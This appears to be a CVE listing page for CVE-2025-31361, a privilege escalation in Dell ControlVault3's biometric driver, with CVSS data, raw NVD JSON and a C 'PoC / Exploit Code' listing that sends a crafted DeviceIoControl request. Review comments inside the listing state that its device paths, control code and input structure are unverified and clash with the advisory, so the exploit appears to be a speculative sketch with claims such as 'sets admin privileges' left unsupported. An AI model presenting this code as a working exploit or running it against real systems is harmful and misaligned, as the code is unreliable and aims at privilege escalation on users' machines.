Security Vulnerability Report
CVE-2025-31361 CVSS 8.7 HIGH

CVE-2025-31361

Published: 2025-11-17 23:15:50
Last Modified: 2026-04-15 00:35:42

Description

A privilege escalation vulnerability exists in the ControlVault WBDI Driver WBIO_USH_ADD_RECORD functionality of Dell ControlVault3 prior to 5.15.14.19 and Dell ControlVault3 Plus prior to 6.2.36.47. A specially crafted WinBioControlUnit call can lead to privilege escalation. An attacker can issue an api call to trigger this vulnerability.

CVSS Details

CVSS Score
8.7
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:L

Configurations (Affected Products)

No configuration data available.

Dell ControlVault3 < 5.15.14.19
Dell ControlVault3 Plus < 6.2.36.47

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
c
/*
 * CVE-2025-31361 PoC - Dell ControlVault3 Privilege Escalation
 * Target: Dell ControlVault3 WBDI Driver WBIO_USH_ADD_RECORD
 * Author: Security Researcher
 * Note: For educational and authorized testing purposes only
 *
 * What the listing does: opens a device path, fills a five-field structure
 * with constants, sends it with one DeviceIoControl call, prints the result
 * and closes the handle.
 *
 * NOTE(review): nothing on this page confirms that the device paths, the
 * control code or the input layout below match the real driver interface.
 * The advisory text describes a crafted WinBioControlUnit call and the
 * record lists CWE-908, while this listing issues a raw DeviceIoControl
 * and its original comments spoke of an overflow and of privilege flags.
 * Treat it as an unverified illustration: neither outcome of a run says
 * anything about patch status. Compare the installed ControlVault3
 * version with the fixed versions named in the advisory (5.15.14.19,
 * Plus 6.2.36.47) instead.
 */
#include <windows.h>
#include <winbio.h>
#include <stdio.h>

// NOTE(review): main() calls no WinBio* function; only the commented-out
// sketch at the end of the listing refers to that API.
#pragma comment(lib, "winbio.lib")

// Control code the author labels as WBIO_USH_ADD_RECORD. The advisory text
// on this page gives no numeric value, so treat this one as unverified.
#define WBIOCTL_ADD_RECORD 0xB0C10058

int main() {
    HANDLE hDevice = INVALID_HANDLE_VALUE;
    BOOL bResult = FALSE;
    DWORD bytesReturned = 0;

    printf("[*] CVE-2025-31361 Dell ControlVault3 Privilege Escalation PoC\n");
    printf("[*] Target: Dell ControlVault3 < 5.15.14.19 / Plus < 6.2.36.47\n");

    // First attempt: open a hard-coded device path for read/write.
    // NOTE(review): the path is the author's; the failure message further
    // down itself says the device name may vary.
    hDevice = CreateFileA(
        "\\\\.\\{7C7D30B7-5C6E-4D40-8F16-9A1D5F8B2C3E}",
        GENERIC_READ | GENERIC_WRITE,
        FILE_SHARE_READ | FILE_SHARE_WRITE,
        NULL,
        OPEN_EXISTING,
        FILE_ATTRIBUTE_NORMAL,
        NULL
    );

    if (hDevice == INVALID_HANDLE_VALUE) {
        // Second attempt with another hard-coded path (equally unverified).
        hDevice = CreateFileA(
            "\\\\.\\{8A7D30B7-5C6E-4D40-8F16-9A1D5F8B2C3F}",
            GENERIC_READ | GENERIC_WRITE,
            FILE_SHARE_READ | FILE_SHARE_WRITE,
            NULL,
            OPEN_EXISTING,
            FILE_ATTRIBUTE_NORMAL,
            NULL
        );
    }

    // Both opens failed: report and exit with status 1.
    if (hDevice == INVALID_HANDLE_VALUE) {
        printf("[-] Failed to open ControlVault driver device\n");
        printf("[*] Note: Device name may vary, enumerate with WinBioEnumSensorProviders\n");
        return 1;
    }

    printf("[+] Successfully opened device handle\n");

    // Input buffer the author describes as exploiting insufficient validation
    // in the driver.
    // NOTE(review): the field names and meanings are the author's labels; no
    // structure definition appears in the advisory text on this page.
    typedef struct _MALICIOUS_WBIO_INPUT {
        ULONG_PTR magic;          // author's label: trigger value (unverified)
        ULONG_PTR record_type;    // author's label: record type (unverified)
        ULONG_PTR data_ptr;       // author's label: pointer to data (unverified)
        ULONG_PTR size;           // author's label: size value (unverified)
        ULONG_PTR flags;          // author's label: privilege flags (unverified)
    } MALICIOUS_WBIO_INPUT, *PMALICIOUS_WBIO_INPUT;

    // Zero-initialise, then overwrite every field with a fixed constant.
    MALICIOUS_WBIO_INPUT input = {0};
    input.magic = 0x41414141;         // filler constant
    input.record_type = 0xFFFFFFFF;   // author claims this bypasses a type check; not shown here
    input.data_ptr = 0xDEADBEEF;      // placeholder constant, not the address of any buffer in this program
    input.size = 0x1000;              // author's note said "overflow"; the record on this page lists CWE-908
    input.flags = 0xFFFFFFFF;         // author claims this sets admin privileges; nothing here demonstrates that

    printf("[*] Sending malicious WBIO_USH_ADD_RECORD request...\n");

    // One request: input buffer only, no output buffer, synchronous call.
    bResult = DeviceIoControl(
        hDevice,
        WBIOCTL_ADD_RECORD,
        &input,
        sizeof(input),
        NULL,
        0,
        &bytesReturned,
        NULL
    );

    // bResult only reflects whether the call itself returned success; the
    // program never checks privileges, it just prints a hint to do so.
    if (bResult) {
        printf("[+] IOCTL request sent successfully\n");
        printf("[*] If vulnerable, check for elevated privileges\n");
    } else {
        printf("[-] IOCTL request failed: %lu\n", GetLastError());
    }

    CloseHandle(hDevice);
    return 0;
}

/*
 * Alternative approach using Windows Biometric API:
 * NOTE(review): incomplete sketch left by the author; it is not compiled
 * and is not derived from the advisory text on this page.
 *
 * WINBIO_SESSION_HANDLE session;
 * WINBIO_ENROLLMENT_CONTEXT enrollment;
 *
 * WinBioOpenSession(WINBIO_TYPE_FINGERPRINT, WINBIO_FLAG_DEFAULT, ...);
 * WinBioEnrollBegin(session, WINBIO_FINGERPOS_THUMB);
 * // Manipulate enrollment context to trigger vulnerability
 * WinBioEnrollCommit(session, &enrollment);
 */

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-31361", "sourceIdentifier": "[email protected]", "published": "2025-11-17T23:15:49.643", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "A privilege escalation vulnerability exists in the ControlVault WBDI Driver WBIO_USH_ADD_RECORD functionality of Dell ControlVault3 prior to 5.15.14.19 and Dell ControlVault3 Plus prior to 6.2.36.47. A specially crafted WinBioControlUnit call can lead to privilege escalation. An attacker can issue an api call to trigger this vulnerability."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:L", "baseScore": 8.7, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.0, "impactScore": 6.0}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-908"}]}], "references": [{"url": "https://talosintelligence.com/vulnerability_reports/TALOS-2025-2174", "source": "[email protected]"}, {"url": "https://www.dell.com/support/kbdoc/en-us/000326061/dsa-2025-228", "source": "[email protected]"}, {"url": "https://www.talosintelligence.com/vulnerability_reports/TALOS-2025-2174", "source": "af854a3a-2127-422b-91ae-364da2661108"}]}}